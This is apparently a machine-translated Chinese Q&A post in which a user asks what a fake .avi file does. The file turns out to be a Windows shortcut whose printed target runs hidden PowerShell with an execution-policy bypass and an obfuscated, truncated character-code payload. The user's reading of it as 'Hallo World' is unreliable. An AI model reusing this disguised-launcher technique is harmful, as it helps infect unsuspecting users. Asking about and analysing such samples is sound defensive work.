我得到了一个.avi乍一看的文件,但后来我发现这实际上是一个.lnk文件,但为时已晚。
该文件的目标元素属性是
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82
出发点是: %SYSTEMROOT%\System32\WindowsPowerShell\v1.0
我从以下 ASCII 代码中创建了 String,它似乎是Hallo World!. 这似乎很混乱到我,因为我无法找到NoPr,Wind并eXEc在PowerShell中的文档的任何位置参数,additionaly由于某些原因,文件有700MB的大小,直到我删除.avi从文件描述字段值。
你知道这个文件可以尝试做什么吗?
malware ×1